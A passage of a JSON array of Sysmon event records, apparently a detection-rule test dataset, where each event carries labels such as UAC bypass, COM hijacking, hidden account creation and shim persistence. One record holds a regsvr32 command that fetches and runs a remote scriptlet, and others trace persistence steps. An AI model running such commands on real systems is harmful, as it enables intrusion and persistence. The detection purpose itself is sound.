Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{F38BF404-1D43-42F2-9305-67DE0B28FC23}\\regedit.exe","EventType":"SetValue","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"747F3D96-8DEC-5F00-0000-0010F0460800","ProcessId":5128,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.reg\\OpenWithList\\b","UtcTime":"2020-07-04 14:31:23.825"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306383,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:23.903600Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Count","UtcTime":"2020-07-04 
14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306384,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.838832Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DefaultInstall","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Section1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306385,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.849140Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\programdata\\gpo.inf","EventType":"SetValue","Image":"C:\\Windows\\regedit.exe","ProcessGuid":"747F3D96-92BB-5F00-0000-0010C1A73100","ProcessId":1452,"RuleName":"Persistence - Pending 
GPO","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\IEAK\\GroupPolicy\\PendingGPOs\\Path1","UtcTime":"2020-07-04 14:31:26.607"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306386,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:31:26.856657Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Details":"\"c:\\windows\\tasks\\taskhost.exe\"","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\evasion\\a.exe","ProcessGuid":"747F3D96-8FD2-5F00-0000-0010C15D2200","ProcessId":3728,"RuleName":"Persistence - Hidden Run value detected","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\","UtcTime":"2020-07-04 14:18:58.231"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":306346,"Execution_attributes":{"ProcessID":3400,"ThreadID":4136},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-07-04T14:18:58.268712Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Windows Registry Persistence COM Search Order Hijacking","OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\ProgramData\\demo.dll","EventType":"SetValue","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\InprocServer32\\(Default)","UtcTime":"2019-05-21 00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":372,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-20 23:39:21.672","Image":"C:\\Users\\IEUser\\Downloads\\com-hijack.exe","ProcessGuid":"365ABB72-47BB-5CE3-0000-0010BFA83E00","ProcessId":1912,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\test.bat","UtcTime":"2019-05-21 
00:35:07.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":373,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-21T00:35:07.474160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\User\\Documents\\mapid.tlb","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-4FED-5CE3-0000-001031174900","ProcessId":3808,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\{Default}","UtcTime":"2019-05-21 01:10:05.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":445,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:05.290459Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event 
Viewer"],"event":{"Event":{"EventData":{"Details":"Apartment","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-5014-5CE3-0000-00105C444900","ProcessId":3860,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{49CBB1C7-97D1-485A-9EC1-A26065633066}\\InProcServer32\\ThreadingModel","UtcTime":"2019-05-21 01:10:44.797"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":447,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:44.807281Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{49CBB1C7-97D1-485A-9EC1-A26065633066}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"365ABB72-501C-5CE3-0000-0010B5494900","ProcessId":2952,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\CLSID\\{84DA0A92-25E0-11D3-B9F7-00C04F4C8F5D}\\TreatAs\\{Default}","UtcTime":"2019-05-21 
01:10:52.458"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":449,"Execution_attributes":{"ProcessID":3416,"ThreadID":3496},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-21T01:10:52.468297Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery","Whoami Execution Anomaly"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"6.3.9600.16384 (winblue_rtm.130821-1623)","Hashes":"SHA1=E06B89D9B87A8A4E5A8B7A5307C3BA88E0A01D41,MD5=D609D59A042C04A50EB41EC5D52F7471,SHA256=16C4CEE8C7BF4070E25A32F0B95857FA5CEC51E47D246E6FBAD69887460961B2,IMPHASH=98A3BC461E82881A801A12AAA668BD47","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"DFAE8213-832F-5CDD-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Windows\\System32\\osk.exe\" ","ParentImage":"C:\\Windows\\System32\\osk.exe","ParentProcessGuid":"DFAE8213-8B02-5CDD-0000-00109BCA0A00","ParentProcessId":1720,"ProcessGuid":"DFAE8213-8B08-5CDD-0000-001011CE0A00","ProcessId":3764,"Product":"Microsoft® Windows® Operating System","RuleName":"technique_id=T1033,technique_name=System Owner/User Discovery","TerminalSessionId":2,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-16 
16:08:40.350"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"DC1.insecurebank.local","Correlation":null,"EventID":1,"EventRecordID":18918,"Execution_attributes":{"ProcessID":1744,"ThreadID":2120},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-16T16:08:40.360593Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Creation of a Local Hidden User Account by Registry"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"747F3D96-68DD-5FDD-0000-00101B660000","ProcessId":648,"RuleName":"Hidden Local Account Created","TargetObject":"HKLM\\SAM\\SAM\\Domains\\Account\\Users\\Names\\hideme0007$\\(Default)","UtcTime":"2020-12-18 17:56:07.015"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":596571,"Execution_attributes":{"ProcessID":3552,"ThreadID":5004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-12-18T17:56:07.017817Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft(C) Register Server","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-B0EC-5CD9-0000-00201D340100","LogonId":"0x1341d","ParentCommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs","ParentImage":"C:\\Windows\\System32\\svchost.exe","ParentProcessGuid":"365ABB72-B0EC-5CD9-0000-0010D9D20000","ParentProcessId":944,"ProcessGuid":"365ABB72-B167-5CD9-0000-001062160C00","ProcessId":2476,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-13 18:03:19.497"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17287,"Execution_attributes":{"ProcessID":276,"ThreadID":1000},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-13T18:03:19.681478Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\lsass.exe","ProcessGuid":"365ABB72-528D-5C91-0000-0010AD570000","ProcessId":500,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Control\\Lsa\\ProductType","UtcTime":"2019-03-19 
20:35:25.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":13,"EventRecordID":1966215,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:41:11.979726Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010AB8C0700","ProcessId":2112,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:48:33.279"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966368,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.439582Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55A1-5C91-0000-0010D6960700","ProcessId":2368,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:48:33.639"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966382,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:48:33.870201Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D7-5C91-0000-001067BD0700","ProcessId":2236,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:27.697"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966388,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:27.787731Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55D8-5C91-0000-001060C90700","ProcessId":3648,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:28.058"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966403,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:28.158264Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E8-5C91-0000-001037DF0700","ProcessId":4052,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:44.712"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966408,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:44.792182Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q -u \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe","ParentProcessGuid":"365ABB72-551C-5C91-0000-001030590500","ParentProcessId":2704,"ProcessGuid":"365ABB72-55E9-5C91-0000-00102EEB0700","ProcessId":2104,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"EXAMPLE\\user01","UtcTime":"2019-03-19 
20:49:45.052"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"PC01.example.corp","Correlation":null,"EventID":1,"EventRecordID":1966423,"Execution_attributes":{"ProcessID":1564,"ThreadID":1252},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-03-19T20:49:45.162715Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Possible Shim Database Persistence via sdbinst.exe"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\sdbinst.exe\" -q \"C:\\Windows\\AppPatch\\Test.SDB \" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\System32\\","Description":"Application Compatibility Database Installer","FileVersion":"6.0.7600.16385 (win7_rtm.090713-1255)","Hashes":"MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F","Image":"C:\\Windows\\System32\\sdbinst.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-5417-5C91-0000-002035340300","LogonId":"0x33435","ParentCommandLine":"\"C:\\Program Files\\Microsoft Application Compatibility Toolkit\\Compatibility Administrator (32-bit)\\Compatadmin.exe\" ","ParentImage":"C:\\Program Files\\Microsoft Application Compatibility 